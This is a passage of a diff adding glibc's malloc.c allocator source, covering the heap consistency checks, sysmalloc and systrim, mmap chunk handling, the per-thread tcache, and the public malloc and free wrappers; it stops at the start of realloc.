+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  uint16_t counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
+                  "PTRDIFF_MAX is not more than half of SIZE_MAX");
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  if (!checked_request2size (bytes, &tbytes))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      && tcache
+      && tcache->counts[tc_idx] > 0)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
